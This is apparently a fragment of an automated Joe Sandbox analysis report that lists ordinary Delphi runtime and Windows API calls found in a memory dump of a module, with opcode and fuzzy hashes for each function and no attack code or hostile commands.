                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20Pair$qqrxbxbRaiseRecpx14RecxiStringx20SurrogateSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1194877190-0
                                                                                                  • Opcode ID: a9b30fe3f2403a0302ec5bf63648d9ce3e1555fb2ec83c40806ccb76183649ed
                                                                                                  • Instruction ID: 5b2fcd8ece5833fd3d9f2a349bbedbb4582ae67bb33aebb72d879f9c31b886ea
                                                                                                  • Opcode Fuzzy Hash: a9b30fe3f2403a0302ec5bf63648d9ce3e1555fb2ec83c40806ccb76183649ed
                                                                                                  • Instruction Fuzzy Hash: 9E419D30A00289ABDF15DFA8ED81AEEB7F5EF44700F5442A6E940D7245E774EE81C790
                                                                                                  APIs
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                    • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024620), ref: 50024537
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50024620), ref: 5002454D
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024620), ref: 5002455D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50024620), ref: 5002457A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50024620), ref: 500245A2
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000000,50024620), ref: 500245B6
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,?,00000000,50024620), ref: 500245C0
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,?,00000000,50024620), ref: 500245CD
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000400,00000001,00000000,?,00000000,?,?,00000000,50024620), ref: 500245F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Char$qqrx20EnsureString$qqrr20$Asg$qqrr20CompareCopy$qqrx20Len$qqrx20StringiiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 4220554184-0
                                                                                                  • Opcode ID: 96b5e629e91b5904e2abc59b103f2b6dd95f87f350b544be9f16c5b7b18ccc62
                                                                                                  • Instruction ID: 0917f6d901124ccc03c99a1b7cbd9fd473add03b710357cd351074ee3f025ca5
                                                                                                  • Opcode Fuzzy Hash: 96b5e629e91b5904e2abc59b103f2b6dd95f87f350b544be9f16c5b7b18ccc62
                                                                                                  • Instruction Fuzzy Hash: 7F41C530A016969FDF41DFB8E951A9EF7F9EF84200F504266E940D7246D770DE41C741
                                                                                                  APIs
                                                                                                  • @Sysutils@GetModuleName$qqrui.RTL120(00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A67B
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A686
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6A3
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6B2
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6B7
                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A6E5
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120(?,?,?,00000003,00000000,00000000), ref: 5002A6F7
                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A720
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120(?,?,?,00000003,00000000,00000000), ref: 5002A733
                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(?,00000000,5002A782,?,?,?,00000003,00000000,00000000), ref: 5002A758
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Sysutils@$String$qqrpxcxi$Len$qqrpxcStringUnicode$Except$qqrvException@$bctr$qqrx20ExtractFileLoadModuleName$qqruiName$qqrx20RaiseRecxiString$qqrp20Stringpx14System@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1154392791-0
                                                                                                  • Opcode ID: 3dce76c8eb215aedfc1eb9f086bf8e2351b8edb69d44172689399a892dcc44c1
                                                                                                  • Instruction ID: 490cf656cc89e769677ed1d8ac02a07099c920838aaedf4d8d0b1e3e7b1f0adf
                                                                                                  • Opcode Fuzzy Hash: 3dce76c8eb215aedfc1eb9f086bf8e2351b8edb69d44172689399a892dcc44c1
                                                                                                  • Instruction Fuzzy Hash: FF41D474A0168A9FDB04CF94DC91ADEB7F4EF18304F40467AE905E7241EA34AE05CBA0
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500117DF), ref: 500116C6
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 500116E3
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 5001171B
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500117DF), ref: 5001174C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500117DF), ref: 50011751
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500117DF), ref: 5001176E
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,500117DF), ref: 5001177A
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,500117DF), ref: 50011788
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,500117DF), ref: 50011798
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$Character@StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Ascii$qqrbAsg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1016462649-0
                                                                                                  • Opcode ID: e1c3648808a7966ff7b4d89349605bd0866a16b14a5e335949c975cf6d57a822
                                                                                                  • Instruction ID: d8a2c921cb0381c3f4e4b64832713658ab93ef8ffd1cbe9df7beed8a80b09d51
                                                                                                  • Opcode Fuzzy Hash: e1c3648808a7966ff7b4d89349605bd0866a16b14a5e335949c975cf6d57a822
                                                                                                  • Instruction Fuzzy Hash: D541E234A081899FDF15DFA8EC816EDB7F5AF04200F5842A6E540E7391E7749E86C791
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010C23), ref: 50010B0A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010B27
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010B5F
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010C23), ref: 50010B90
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010C23), ref: 50010B95
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010BB2
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50010C23), ref: 50010BBE
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50010C23), ref: 50010BCC
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,50010C23), ref: 50010BDC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$Character@StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Ascii$qqrbAsg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1016462649-0
                                                                                                  • Opcode ID: 055fdcc4fd2cb603ec54a412d362998b8024ac72caa7866e3aaa1dae6ff76cc5
                                                                                                  • Instruction ID: e0cb8508ea0ee3c123a5ca94656853c590a1bcf096955fea472a91734319ba04
                                                                                                  • Opcode Fuzzy Hash: 055fdcc4fd2cb603ec54a412d362998b8024ac72caa7866e3aaa1dae6ff76cc5
                                                                                                  • Instruction Fuzzy Hash: 2041C334A042899BDF11DFA8EC815EFB7F5AF44304F5043A6E980E7256D7B49E85D780
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500119B9), ref: 500118A6
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 500118C3
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 500118FB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500119B9), ref: 5001192C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500119B9), ref: 50011931
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 5001194E
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,500119B9), ref: 5001195A
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,500119B9), ref: 50011992
                                                                                                  • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120(00000000,500119B9), ref: 50011997
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  • API ID: System@Unicode$Character@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20CategoryCategory$qqrx20CheckExcept$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiSeparator$qqr26StringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2188507345-0
                                                                                                  • Opcode ID: 85115377bf31bf0ae937a71f4f08936809c5e55ff9e9a0035250b4a8e60bbdc2
                                                                                                  • Instruction ID: 70db1d6cf51ae63cbd989f7e97dabe6d18dd781c46a6f130b903eaa5e37548f1
                                                                                                  • Opcode Fuzzy Hash: 85115377bf31bf0ae937a71f4f08936809c5e55ff9e9a0035250b4a8e60bbdc2
                                                                                                  • Instruction Fuzzy Hash: B531A030A00289ABEF15DFA4ECA16EDB7F9EF45300F984266E950D7241EB709EC1D791
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011268), ref: 5001116A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 50011187
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 500111BF
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011268), ref: 500111F0
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011268), ref: 500111F5
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 50011212
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50011268), ref: 5001121E
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50011268), ref: 5001122C
                                                                                                  • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120(00000000,50011268), ref: 50011231
                                                                                                  • API ID: System@Unicode$Character@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20CategoryCategory$qqrx20CheckExcept$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiSeparator$qqr26StringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2188507345-0
                                                                                                  • Opcode ID: 8add54bfcd6dd47ba13f697dc763ddc4121468a9bd01c1802535063be17968c9
                                                                                                  • Instruction ID: 5ac73815b234001b978d6f963799290576de029f4385e846c2353e19faa8a449
                                                                                                  • Opcode Fuzzy Hash: 8add54bfcd6dd47ba13f697dc763ddc4121468a9bd01c1802535063be17968c9
                                                                                                  • Instruction Fuzzy Hash: E831E130A00289ABDF05DFA4EC916EEB7F5EF55200F5442A6EA00E7641D7709E82C781
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002DC60
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002DC65
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DC88
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DC8D
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCB0
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCB5
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002DCBC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCE1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCE6
                                                                                                  • @Sysutils@TEncoding@GetCharCount$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,?), ref: 5002DCF3
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?,?,?,?), ref: 5002DD0D
                                                                                                  • API ID: System@$System@@$RaiseStringSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$ArrayLength$qqrv$AfterArray$tuc%iiCharClassClassoConstruction$qqrp14Count$qqrx25Create$qqrp17DynamicEncoding@Error$qqrucList$qqrvLoadMetaObjectString$qqrp20System@%
                                                                                                  • String ID:
                                                                                                  • API String ID: 599856924-0
                                                                                                  • Opcode ID: 39a4f14e8c5afb2c123811a7d51c8647724a787ebbbc59abf295d9c5b720c570
                                                                                                  • Instruction ID: 0309c5079e81be2084f52493be9e10f0a15843ad46e8c2d9995aaba0ab869005
                                                                                                  • Opcode Fuzzy Hash: 39a4f14e8c5afb2c123811a7d51c8647724a787ebbbc59abf295d9c5b720c570
                                                                                                  • Instruction Fuzzy Hash: A3319371A05586ABDB00DFD8ECD1BAEB7B9BB58304F50826AF904D7352CB71AD01CB90
                                                                                                  APIs
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B37F
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B391
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3A1
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3A9
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3C6
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000001,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3DB
                                                                                                  • @System@@DynArrayHigh$qqrv.RTL120 ref: 5002B3E6
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5002B408
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5002B416
                                                                                                  • API ID: System@Unicode$System@@$ArrayStringStringx20$Asg$qqrr20Length$qqrv$Cat3$qqrr20Char$qqrr20Copy$qqrx20FromHigh$qqrvInt$qqrx20StringiiStringpbStringt2Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2891979734-0
                                                                                                  • Opcode ID: 62cae7c73cfc9a71c568ecde9f2d99c8dca23b157ec7d973969221ac07eb201c
                                                                                                  • Instruction ID: 33f49da7cf7d534711dd3b735e4964b946f028d1e955376cf8d5b37d4a493396
                                                                                                  • Opcode Fuzzy Hash: 62cae7c73cfc9a71c568ecde9f2d99c8dca23b157ec7d973969221ac07eb201c
                                                                                                  • Instruction Fuzzy Hash: CB313274A01189DBEB00EF94E991AAEB7B8EF44300F508276E9059B356DB34EE45CB90
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,50030A24), ref: 500309A6
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,50030A24), ref: 500309A1
                                                                                                    • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                    • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                    • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,50030A24), ref: 50030992
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 50030975
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 500309B2
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 500309C6
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,50030A24), ref: 500309E3
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,50030A24), ref: 500309F2
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50030A24), ref: 500309F7
